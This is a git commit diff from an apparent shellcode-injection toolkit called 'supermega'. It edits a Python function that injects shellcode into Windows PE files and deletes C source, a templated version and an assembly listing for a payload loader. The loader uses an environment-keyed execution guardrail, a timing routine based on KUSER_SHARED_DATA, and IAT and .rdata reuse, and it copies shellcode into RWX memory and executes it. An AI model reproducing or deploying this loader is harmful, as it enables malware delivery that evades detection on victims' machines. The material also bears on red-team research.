refactor: small fixes

2026-06-03 01:27:11 +00:00 · 2024-03-29 20:47:49 +00:00
parent 4410685d0d
commit 3207aa296d
8 changed files with 3 additions and 380 deletions
@@ -4,7 +4,7 @@ bak/
 tools/
 doc/
-data/exes_more/
+data/binary/exes_more/
 data/source/payload/
 log-*
@@ -26,7 +26,7 @@ def inject_exe(
    inject_mode: InjectStyle = settings.inject_mode
    source_style: SourceStyle = settings.source_style
-    logger.info("--[ Injecting: {} into: {} -> {}".format(
+    logger.info("--[ Injecting: {} + {} -> {}".format(
        shellcode_in, exe_in, exe_out
    ))
@@ -52,6 +52,7 @@ def inject_exe(
        logger.error('Could not setup shellcode launch within PE file!')
        return False
    logger.info("--[ Rewrite placeholders with their data")
    if source_style == SourceStyle.iat_reuse:
        injected_fix_iat(superpe, project.carrier, project.exe_host)
@@ -1,246 +0,0 @@
 ; Listing generated by Microsoft (R) Optimizing Compiler Version 19.37.32822.0
 include listing.inc
 ; INCLUDELIB LIBCMT
 ; INCLUDELIB OLDNAMES
 _DATA	SEGMENT
 COMM	supermega_payload:QWORD
 _DATA	ENDS
 PUBLIC	get_time_raw
 PUBLIC	sleep_ms
 PUBLIC	main
 PUBLIC	mystrcmp
 ; EXTRN	__imp_GetEnvironmentVariableW:PROC
 ; EXTRN	__imp_VirtualAlloc:PROC
 _DATA	SEGMENT
 $SG72751 DB	'U', 00H, 'S', 00H, 'E', 00H, 'R', 00H, 'P', 00H, 'R', 00H
 	DB	'O', 00H, 'F', 00H, 'I', 00H, 'L', 00H, 'E', 00H, 00H, 00H
 $SG72752 DB	'C', 00H, ':', 00H, '\', 00H, 'U', 00H, 's', 00H, 'e', 00H
 	DB	'r', 00H, 's', 00H, '\', 00H, 'h', 00H, 'a', 00H, 'c', 00H, 'k'
 	DB	00H, 'e', 00H, 'r', 00H, 00H, 00H
 _DATA	ENDS
 PUBLIC  AlignRSP
 _TEXT SEGMENT
 AlignRSP PROC
 and  rsp, 0FFFFFFFFFFFFFFF0h ; Align RSP to 16 bytes
 call main ; Call the entry point of the payload
 AlignRSP ENDP
 _TEXT ENDS
 _TEXT	SEGMENT
 i$ = 0
 str1$ = 32
 str2$ = 40
 mystrcmp PROC
 ; File C:\Users\hacker\source\repos\supermega\projects\Verify_1\main.c
 ; Line 58
 $LN6:
 	mov	QWORD PTR [rsp+16], rdx
 	mov	QWORD PTR [rsp+8], rcx
 	sub	rsp, 24
 ; Line 59
 	mov	DWORD PTR i$[rsp], 0
 $LN2@mystrcmp:
 ; Line 60
 	movsxd	rax, DWORD PTR i$[rsp]
 	mov	rcx, QWORD PTR str1$[rsp]
 	movzx	eax, WORD PTR [rcx+rax*2]
 	test	eax, eax
 	je	SHORT $LN3@mystrcmp
 	movsxd	rax, DWORD PTR i$[rsp]
 	mov	rcx, QWORD PTR str2$[rsp]
 	movzx	eax, WORD PTR [rcx+rax*2]
 	test	eax, eax
 	je	SHORT $LN3@mystrcmp
 ; Line 61
 	movsxd	rax, DWORD PTR i$[rsp]
 	mov	rcx, QWORD PTR str1$[rsp]
 	movzx	eax, WORD PTR [rcx+rax*2]
 	movsxd	rcx, DWORD PTR i$[rsp]
 	mov	rdx, QWORD PTR str2$[rsp]
 	movzx	ecx, WORD PTR [rdx+rcx*2]
 	cmp	eax, ecx
 	je	SHORT $LN4@mystrcmp
 ; Line 62
 	mov	eax, 1
 	jmp	SHORT $LN1@mystrcmp
 $LN4@mystrcmp:
 ; Line 64
 	mov	eax, DWORD PTR i$[rsp]
 	inc	eax
 	mov	DWORD PTR i$[rsp], eax
 ; Line 65
 	jmp	SHORT $LN2@mystrcmp
 $LN3@mystrcmp:
 ; Line 66
 	xor	eax, eax
 $LN1@mystrcmp:
 ; Line 67
 	add	rsp, 24
 	ret	0
 mystrcmp ENDP
 _TEXT	ENDS
 ; Function compile flags: /Odtp
 _TEXT	SEGMENT
 n$1 = 32
 result$ = 36
 dest$ = 40
 envVarName$ = 48
 tocheck$ = 72
 buffer$ = 112
 main	PROC
 ; File C:\Users\hacker\source\repos\supermega\projects\Verify_1\main.c
 ; Line 23
 $LN8:
 	push	rsi
 	push	rdi
 	sub	rsp, 2168				; 00000878H
 ; Line 29
 	lea	rax, QWORD PTR envVarName$[rsp]
 	DB 024H, 0d1H, 0b7H, 05aH, 004H, 04cH, 020H ; .rdata Reuse for $SG72751 (rcx)
 	mov	rdi, rax
 	mov	rsi, rcx
 	mov	ecx, 24
 	rep movsb
 ; Line 30
 	lea	rax, QWORD PTR tocheck$[rsp]
 	DB 01cH, 088H, 026H, 0deH, 0f0H, 0d2H, 0d4H ; .rdata Reuse for $SG72752 (rcx)
 	mov	rdi, rax
 	mov	rsi, rcx
 	mov	ecx, 32					; 00000020H
 	rep movsb
 ; Line 32
 	mov	r8d, 1024				; 00000400H
 	lea	rdx, QWORD PTR buffer$[rsp]
 	lea	rcx, QWORD PTR envVarName$[rsp]
 	DB 06fH, 0c8H, 0f2H, 0e0H, 041H, 089H ; IAT Reuse for GetEnvironmentVariableW
 	mov	DWORD PTR result$[rsp], eax
 ; Line 33
 	cmp	DWORD PTR result$[rsp], 0
 	jne	SHORT $LN5@main
 ; Line 34
 	mov	eax, 6
 	jmp	SHORT $LN1@main
 $LN5@main:
 ; Line 36
 	lea	rdx, QWORD PTR tocheck$[rsp]
 	lea	rcx, QWORD PTR buffer$[rsp]
 	call	mystrcmp
 	test	eax, eax
 	je	SHORT $LN6@main
 ; Line 37
 	mov	eax, 6
 	jmp	SHORT $LN1@main
 $LN6@main:
 ; Line 42
 	mov	r9d, 64					; 00000040H
 	mov	r8d, 12288				; 00003000H
 	mov	edx, 272				; 00000110H
 	xor	ecx, ecx
 	DB 078H, 00eH, 02fH, 0edH, 0fbH, 0c4H ; IAT Reuse for VirtualAlloc
 	mov	QWORD PTR dest$[rsp], rax
 ; Line 47
 	mov	DWORD PTR n$1[rsp], 0
 	jmp	SHORT $LN4@main
 $LN2@main:
 	mov	eax, DWORD PTR n$1[rsp]
 	inc	eax
 	mov	DWORD PTR n$1[rsp], eax
 $LN4@main:
 	cmp	DWORD PTR n$1[rsp], 272			; 00000110H
 	jge	SHORT $LN3@main
 ; Line 48
 	movsxd	rax, DWORD PTR n$1[rsp]
 	movsxd	rcx, DWORD PTR n$1[rsp]
 	mov	rdx, QWORD PTR dest$[rsp]
 	lea	rdi, [shcstart]  ; get payload shellcode address
 	movzx	eax, BYTE PTR [rdi+rax]
 	mov	BYTE PTR [rdx+rcx], al
 ; Line 49
 	jmp	SHORT $LN2@main
 $LN3@main:
 ; Line 53
 	call	QWORD PTR dest$[rsp]
 ; Line 55
 	xor	eax, eax
 $LN1@main:
 ; Line 56
 	add	rsp, 2168				; 00000878H
 	pop	rdi
 	pop	rsi
 	ret	0
 main	ENDP
 _TEXT	ENDS
 ; Function compile flags: /Odtp
 _TEXT	SEGMENT
 start$ = 32
 sleeptime$ = 64
 sleep_ms PROC
 ; File C:\Users\hacker\source\repos\supermega\projects\Verify_1\main.c
 ; Line 17
 $LN5:
 	mov	DWORD PTR [rsp+8], ecx
 	sub	rsp, 56					; 00000038H
 ; Line 18
 	call	get_time_raw
 	mov	DWORD PTR start$[rsp], eax
 $LN2@sleep_ms:
 ; Line 19
 	call	get_time_raw
 	sub	eax, DWORD PTR start$[rsp]
 	cmp	eax, DWORD PTR sleeptime$[rsp]
 	jae	SHORT $LN3@sleep_ms
 	jmp	SHORT $LN2@sleep_ms
 $LN3@sleep_ms:
 ; Line 20
 	add	rsp, 56					; 00000038H
 	ret	0
 sleep_ms ENDP
 _TEXT	ENDS
 ; Function compile flags: /Odtp
 _TEXT	SEGMENT
 kernelTime$ = 0
 PUserSharedData_TickCountMultiplier$ = 8
 PUserSharedData_High1Time$ = 16
 PUserSharedData_LowPart$ = 24
 get_time_raw PROC
 ; File C:\Users\hacker\source\repos\supermega\projects\Verify_1\main.c
 ; Line 7
 $LN3:
 	sub	rsp, 40					; 00000028H
 ; Line 8
 	mov	QWORD PTR PUserSharedData_TickCountMultiplier$[rsp], 2147352580 ; 7ffe0004H
 ; Line 9
 	mov	QWORD PTR PUserSharedData_High1Time$[rsp], 2147353380 ; 7ffe0324H
 ; Line 10
 	mov	QWORD PTR PUserSharedData_LowPart$[rsp], 2147353376 ; 7ffe0320H
 ; Line 11
 	mov	rax, QWORD PTR PUserSharedData_High1Time$[rsp]
 	mov	eax, DWORD PTR [rax]
 	shl	eax, 8
 	mov	rcx, QWORD PTR PUserSharedData_TickCountMultiplier$[rsp]
 	mov	ecx, DWORD PTR [rcx]
 	imul	ecx, eax
 	mov	eax, ecx
 	mov	eax, eax
 	mov	rcx, QWORD PTR PUserSharedData_LowPart$[rsp]
 	mov	ecx, DWORD PTR [rcx]
 	mov	rdx, QWORD PTR PUserSharedData_TickCountMultiplier$[rsp]
 	mov	edx, DWORD PTR [rdx]
 	imul	rcx, rdx
 	shr	rcx, 24
 	add	rax, rcx
 	mov	DWORD PTR kernelTime$[rsp], eax
 ; Line 13
 	mov	eax, DWORD PTR kernelTime$[rsp]
 ; Line 14
 	add	rsp, 40					; 00000028H
 	ret	0
 get_time_raw ENDP
 shcstart:  ; start of payload shellcode
 _TEXT	ENDS
 END
@@ -1,67 +0,0 @@
 #include <Windows.h>
 #include <time.h>
 char *supermega_payload;
 int get_time_raw() {
    ULONG* PUserSharedData_TickCountMultiplier = (PULONG)0x7ffe0004;
    LONG* PUserSharedData_High1Time = (PLONG)0x7ffe0324;
    ULONG* PUserSharedData_LowPart = (PULONG)0x7ffe0320;
    DWORD kernelTime = (*PUserSharedData_TickCountMultiplier) * (*PUserSharedData_High1Time << 8) +
        ((*PUserSharedData_LowPart) * (unsigned __int64)(*PUserSharedData_TickCountMultiplier) >> 24);
    return kernelTime;
 }
 int sleep_ms(DWORD sleeptime) {
    DWORD start = get_time_raw();
    while (get_time_raw() - start < sleeptime) {}
 }
 int main()
 {
 	//sleep_ms(10000);
 	// Execution Guardrail: Env Check
 	//wchar_t envVarName[] = {'U','S','E','R','P','R','O','F','I','L','E', 0};
 	//wchar_t tocheck[] = {'C',':','\\','U','s','e','r','s','\\','h','a','c','k','e','r', 0}; // L"C:\\Users\\hacker"
 	wchar_t envVarName[] = L"USERPROFILE";
 	wchar_t tocheck[] = L"C:\\Users\\hacker";
 	WCHAR buffer[1024];  // NOTE: Do not make it bigger, or we have a __chkstack() dependency!
 	DWORD result = ((DWORD(WINAPI*)(LPCWSTR, LPWSTR, DWORD))GetEnvironmentVariableW)(envVarName, buffer, 1024);
 	if (result == 0) {
 		return 6;
 	}
 	if (mystrcmp(buffer, tocheck) != 0) { 
 		return 6;
 	}
 	// Allocate 1
    // char *dest = ...
    char *dest = VirtualAlloc(NULL, 272, 0x3000, 0x40);
 	// Copy (and decode)
 	// from: supermega_payload[]
 	// to:   dest[]
    for (int n=0; n<272; n++) {
        dest[n] = supermega_payload[n];
    }
    // Execute *dest
    (*(void(*)())(dest))();
 	return 0;
 }
 int mystrcmp(wchar_t* str1, wchar_t* str2) {
 	int i = 0;
 	while (str1[i] != L'\0' && str2[i] != L'\0') {
 		if (str1[i] != str2[i]) {
 			return 1;
 		}
 		i++;
 	}
 	return 0;
 }
@@ -1,65 +0,0 @@
 #include <Windows.h>
 #include <time.h>
 char *supermega_payload;
 int get_time_raw() {
    ULONG* PUserSharedData_TickCountMultiplier = (PULONG)0x7ffe0004;
    LONG* PUserSharedData_High1Time = (PLONG)0x7ffe0324;
    ULONG* PUserSharedData_LowPart = (PULONG)0x7ffe0320;
    DWORD kernelTime = (*PUserSharedData_TickCountMultiplier) * (*PUserSharedData_High1Time << 8) +
        ((*PUserSharedData_LowPart) * (unsigned __int64)(*PUserSharedData_TickCountMultiplier) >> 24);
    return kernelTime;
 }
 int sleep_ms(DWORD sleeptime) {
    DWORD start = get_time_raw();
    while (get_time_raw() - start < sleeptime) {}
 }
 int main()
 {
 	//sleep_ms(10000);
 	// Execution Guardrail: Env Check
 	//wchar_t envVarName[] = {'U','S','E','R','P','R','O','F','I','L','E', 0};
 	//wchar_t tocheck[] = {'C',':','\\','U','s','e','r','s','\\','h','a','c','k','e','r', 0}; // L"C:\\Users\\hacker"
 	wchar_t envVarName[] = L"USERPROFILE";
 	wchar_t tocheck[] = L"C:\\Users\\hacker";
 	WCHAR buffer[1024];  // NOTE: Do not make it bigger, or we have a __chkstack() dependency!
 	DWORD result = ((DWORD(WINAPI*)(LPCWSTR, LPWSTR, DWORD))GetEnvironmentVariableW)(envVarName, buffer, 1024);
 	if (result == 0) {
 		return 6;
 	}
 	if (mystrcmp(buffer, tocheck) != 0) { 
 		return 6;
 	}
 	// Allocate 1
    // char *dest = ...
    char *dest = VirtualAlloc(NULL, {{PAYLOAD_LEN}}, 0x3000, 0x40);
 	// Copy (and decode)
 	// from: supermega_payload[]
 	// to:   dest[]
 {{ plugin_decoder }}
    // Execute *dest
    (*(void(*)())(dest))();
 	return 0;
 }
 int mystrcmp(wchar_t* str1, wchar_t* str2) {
 	int i = 0;
 	while (str1[i] != L'\0' && str2[i] != L'\0') {
 		if (str1[i] != str2[i]) {
 			return 1;
 		}
 		i++;
 	}
 	return 0;
 }